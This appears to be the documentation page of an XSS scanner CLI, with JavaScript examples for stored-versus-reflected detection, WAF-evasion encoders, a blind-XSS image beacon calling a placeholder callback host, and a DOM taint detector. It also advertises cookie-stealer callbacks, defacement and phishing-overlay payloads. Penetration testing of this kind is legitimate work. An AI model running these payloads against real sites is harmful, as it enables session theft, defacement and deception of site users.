
wanzofc-hunter v2.0.3

xss security scanner cli

Downloads: 394

🕸️ wanzofc-hunter v2.0 - Documentation

wanzofc-hunter is a modular XSS (Cross-Site Scripting) scanner built for penetration testing. It automates WAF evasion, ships polyglot payloads, and carries visual defacement payloads that demonstrate impact.


🚀 Key Features

1. 🛡️ Intelligent Core Engine

  • Scans sequentially and keeps a history of findings so the same hit is not logged twice. Distinguishes Reflected from Stored XSS with a "Clean URL Check": after a payload is reflected, the page is requested again without the payload, and a payload that is still present was stored server-side.
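
The reflected-versus-stored decision and the duplicate suppression described above, as an added example that is not wanzofc-hunter's own code. The target is a constructed in-memory stand-in for an HTTP client (a real scanner would make requests in its place); the `{xss}` placeholder convention matches the usage section, and the host `lab.test` and the endpoint names are assumptions.

```javascript
// Added example, not wanzofc-hunter's own code: a scanner core that tells
// Reflected from Stored XSS with a "clean URL check" and uses a history set so
// the same finding is not logged twice. The target is a constructed in-memory
// stand-in for an HTTP client; fetch() would take its place in a real run.

// Constructed target: /search reflects ?q= unescaped, /guestbook stores ?msg= unescaped.
const guestbook = [];
function fakeTarget(url) {
  const u = new URL(url);
  if (u.pathname === '/search') {
    return `<h1>Results for ${u.searchParams.get('q') ?? ''}</h1>`;
  }
  if (u.pathname === '/guestbook') {
    const msg = u.searchParams.get('msg');
    if (msg !== null) guestbook.push(msg);
    return `<ul>${guestbook.map((m) => `<li>${m}</li>`).join('')}</ul>`;
  }
  return '<p>not found</p>';
}

// Put the payload into every query parameter whose value is the {xss} placeholder.
function injectUrl(template, payload) {
  const u = new URL(template);
  for (const [k, v] of [...u.searchParams]) if (v === '{xss}') u.searchParams.set(k, payload);
  return u.toString();
}

// The "clean" URL is the template with the placeholder parameters removed entirely.
function cleanUrl(template) {
  const u = new URL(template);
  for (const [k, v] of [...u.searchParams]) if (v === '{xss}') u.searchParams.delete(k);
  return u.toString();
}

// One probe: inject a unique marker, check it came back unescaped, then decide
// reflected vs stored by fetching the clean URL. Returns null when nothing new
// was found (not vulnerable, or the same finding is already in the history).
function probe(template, marker, fetchFn, history) {
  const payload = `<wh-${marker}>`;                       // harmless tag, unique per probe
  if (!fetchFn(injectUrl(template, payload)).includes(payload)) return null;
  const clean = cleanUrl(template);
  const type = fetchFn(clean).includes(payload) ? 'stored' : 'reflected';
  const key = `${clean}|${type}`;
  if (history.has(key)) return null;                      // duplicate: do not log again
  history.add(key);
  return { url: clean, type };
}

// Sequential scan over URL templates with a shared history.
function scan(templates, fetchFn) {
  const history = new Set();
  const findings = [];
  templates.forEach((template, i) => {
    const hit = probe(template, `m${i}`, fetchFn, history);
    if (hit) findings.push(hit);
  });
  return findings;
}

console.log(scan([
  'http://lab.test/search?q={xss}',
  'http://lab.test/guestbook?msg={xss}',
  'http://lab.test/search?q={xss}',     // same endpoint again: suppressed by history
  'http://lab.test/about?x={xss}',      // not vulnerable
], fakeTarget));
```

The marker is a tag that no page would normally contain, so a raw `<wh-…>` in the response proves the input was not HTML-escaped; checking for the marker text alone would also match an entity-encoded (safe) reflection.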

2. 🎭 Auto WAF Evasion (Bypass)

  • Generates encoded variations of every payload to get past web application firewalls.
    • Techniques: URL Encode, Double URL Encode, Hex Encoding, HTML Entity, Base64 Wrapper.
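
The five encodings listed above, generated for one payload, as an added example that is not the project's encoder.js. The single-decode filter is a constructed stand-in for a signature WAF, included to show why double URL encoding and the non-URL encodings get past it; which variants actually reach a given target is target-specific. The hex and entity encoders assume an ASCII payload.

```javascript
// Added example, not the project's encoder.js: the encoding variants named in the
// feature list for one payload, plus a naive single-decode filter standing in for a
// WAF. A scanner emits all variants and tries each in turn.

function hexEncodeJs(s) {            // "\x3c" escapes: decoded only inside a JS string literal (ASCII only)
  return [...s].map((c) => '\\x' + c.charCodeAt(0).toString(16).padStart(2, '0')).join('');
}
function htmlEntities(s) {           // numeric entities: decoded by the HTML parser in body/attribute context
  return [...s].map((c) => `&#${c.charCodeAt(0)};`).join('');
}
function base64Wrapper(js) {         // runs a JS payload from base64; only useful where input lands in a script context
  return `eval(atob('${Buffer.from(js, 'utf8').toString('base64')}'))`;
}
function variants(payload) {
  return {
    raw: payload,
    urlEncoded: encodeURIComponent(payload),
    doubleUrlEncoded: encodeURIComponent(encodeURIComponent(payload)),
    hex: hexEncodeJs(payload),
    htmlEntity: htmlEntities(payload),
    base64: base64Wrapper(payload),
  };
}

// Constructed stand-in for a signature WAF: URL-decode once, then pattern-match.
function naiveWafBlocks(value) {
  return /<script|onerror|javascript:/i.test(decodeURIComponent(value));
}

// Names of the variants that get past the naive filter (the ones worth sending first).
function survivors(payload) {
  return Object.entries(variants(payload))
    .filter(([, v]) => !naiveWafBlocks(v))
    .map(([name]) => name);
}

console.log(survivors('<script>alert(1)</script>'));
```

The double-encoded variant survives because one decode turns `%253C` into `%3C`, not `<`; it only becomes an attack if the application decodes a second time, which is exactly what the scanner is testing for.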

3. 💣 Polyglot Payloads

  • Uses payload strings built to break out of several contexts (HTML body, attribute, script tag) at once, so a single request covers multiple injection contexts.

4. 🎨 Visual & Deface Payloads

  • Payloads with an immediate visual effect, for proof-of-concept evidence.
    • Effects: CSS Kill (white screen), Rotate Chaos (180° page rotation), Blackout (dark overlay), Fake Deface (HTML injection).

5. 👻 Blind XSS & Cookie Stealer

  • Supports Out-of-Band (OOB) interaction: injected payloads call back to a server or webhook you control to signal execution or exfiltrate cookies, so a stored payload that only fires later in another user's browser is still detected.
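
An out-of-band probe and the matching receiver-side lookup, as an added example that is not the project's own payload module. It covers the "signal execution" case: the beacon reports a per-injection token and the page it fired on, which is what lets a hit that arrives hours later be traced back to the form or parameter it came from. The callback URL, token format and endpoint path are assumptions.

```javascript
// Added example, not the project's own payload module: an out-of-band probe that
// beacons to a callback URL you control, and the receiver-side lookup that maps a
// hit back to the injection point. Callback host, token and path are assumptions.

// One token per injection point: a hit that arrives days later still identifies
// which form or parameter the payload came from. Tokens must be URL-safe.
function blindPayload(callbackUrl, token) {
  const js =
    `new Image().src=${JSON.stringify(callbackUrl)}+'?t=${token}&l='+encodeURIComponent(location.href)`;
  // Image beacon: no CORS preflight, fires as soon as the tag is parsed and the bogus src fails.
  return `<img src=x onerror="${js.replace(/"/g, '&quot;')}">`;
}

// Scanner side: remember where each token was injected.
function registerInjection(registry, token, injectedAt) {
  registry.set(token, injectedAt);
  return registry;
}

// Receiver side: resolve the request line of an incoming hit to an injection point.
function resolveHit(registry, requestUrl) {
  const u = new URL(requestUrl, 'http://callback.invalid');  // base lets a bare path parse
  const token = u.searchParams.get('t');
  if (!token || !registry.has(token)) return null;             // unknown token: scanner noise, ignore
  return { injectedAt: registry.get(token), firedOn: u.searchParams.get('l') };
}

// Walk-through with constructed values.
const registry = registerInjection(new Map(), 'k7f2q', 'https://target.test/profile (bio field)');
console.log(blindPayload('https://cb.example/log', 'k7f2q'));
console.log(resolveHit(registry, '/log?t=k7f2q&l=https%3A%2F%2Ftarget.test%2Fadmin%2Fusers'));
```

Without the token, a blind hit tells you only that something fired somewhere; with it, the receiver knows which injection produced it, and `firedOn` shows whether the stored input surfaced in an admin view rather than on the page you submitted it from.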

6. 📂 Special Vectors (File & Input)

  • Targeted payloads for specific entry points.
    • File Upload: double extension bypass (image.jpg<script>.gif), null byte injection.
    • Input Fields: username length limits, bio/profile injection, address fields.

7. 🧨 Destructive Mode

  • Aggressive payloads for stress testing. Use with caution: these degrade or deceive real users of the target, so run them only with explicit authorization.
    • Types: Loop Alert (browser hang), Miner (CPU stress), Phishing Overlay (fake login form), Redirect Loop.

8. 🏗️ DOM XSS Scanner

  • Detects client-side vulnerabilities by tracing attacker-controlled DOM sources (location.hash) into dangerous sinks (document.write).
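
A source-to-sink pass over script text, as an added example that is not the project's DOM detector. It goes one step beyond matching a source and a sink in the same statement: a variable assigned from a source is marked tainted, so a sink that later consumes that variable is also flagged. It splits on `;` and newlines instead of parsing, so it handles straight-line code only; a real detector would walk an AST. The sample script is constructed.

```javascript
// Added example, not the project's DOM detector: a small static pass that flags
// statements where a DOM source (or a variable assigned from one) reaches a
// dangerous sink. Splits on ';' and newlines rather than parsing; the sample is constructed.

const SOURCES = ['location.hash', 'location.search', 'location.href', 'document.referrer', 'window.name', 'document.URL'];
const SINKS = ['document.write', 'innerHTML', 'outerHTML', 'insertAdjacentHTML', 'eval(', 'setTimeout(', 'Function('];

function findDomXss(script) {
  const tainted = new Set();                 // identifiers assigned from a source
  const findings = [];
  const stmts = script.split(/;|\n/).map((s) => s.trim()).filter(Boolean);

  const isTainted = (expr) =>
    SOURCES.some((src) => expr.includes(src)) ||
    [...tainted].some((id) => new RegExp(`\\b${id}\\b`).test(expr));

  stmts.forEach((stmt, index) => {
    const sink = SINKS.find((s) => stmt.includes(s));
    if (sink && isTainted(stmt)) findings.push({ index, sink, statement: stmt });
    // simple assignment `x = <expr>` (optionally var/let/const): propagate taint to x
    const m = stmt.match(/^(?:var|let|const)?\s*([A-Za-z_$][\w$]*)\s*=(?!=)\s*(.+)$/);
    if (m && isTainted(m[2])) tainted.add(m[1]);
  });
  return findings;
}

// Constructed sample: two sinks fed through a tainted variable, one fed directly,
// and one safe sink (textContent) that must not be flagged.
const SAMPLE = `
var q = decodeURIComponent(location.hash.slice(1));
document.getElementById('out').innerHTML = '<b>' + q + '</b>';
document.write('<p>' + q + '</p>');
var ref = document.referrer;
el.textContent = ref;
eval('go(' + window.name + ')');
`;
console.log(findDomXss(SAMPLE));
```

The `textContent` line is the control: it takes a tainted value but is not a sink, and a detector that only grepped for sources would report it as a false positive.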

9. 🧪 Responsive Vulnerable Lab

  • Includes a built-in local server (server.js) with a responsive dark-mode UI that simulates Reflected, Stored, and DOM XSS scenarios for practice runs.

📖 Usage

Standard Scan (Reflected/DOM)

node bin/wanzofc-hunter --url "http://target.com/search?q={xss}"

Blind XSS / Stealer

node bin/wanzofc-hunter --url "http://target.com/?q={xss}" --callback "http://your-webhook.site/log"

Specific Target (File Upload)

node bin/wanzofc-hunter --url "http://target.com/upload?filename={xss}"

Run Vulnerable Lab (Localhost)

# Terminal 1
node server.js

# Terminal 2
node bin/wanzofc-hunter --url "http://localhost:3000/?q={xss}"

📂 Project Structure

  • bin/: Executable CLI entry point.
  • cli/: CLI wrapper, help menu, banner.
  • src/core/:
    • engine.js: Main orchestrator.
    • scanner.js: Scanning logic & detection algorithms.
  • src/detectors/: Logic for Reflected, Stored, and DOM detection.
  • src/payloads/:
    • basic/: Simple script tags.
    • polyglot/: Multi-context bypasses.
    • visual/: Defacement & CSS manipulation.
    • destructive/: Miners, loopers, overlays.
    • special/: SVG, Iframe, Audio vectors.
    • files/: Filename manipulation.
  • src/utils/:
    • encoder.js: WAF evasion logic (Hex, Base64, etc).
    • http-client.js: HTTP GET/POST handler.

Author: WanzOFC Version: 2.0.0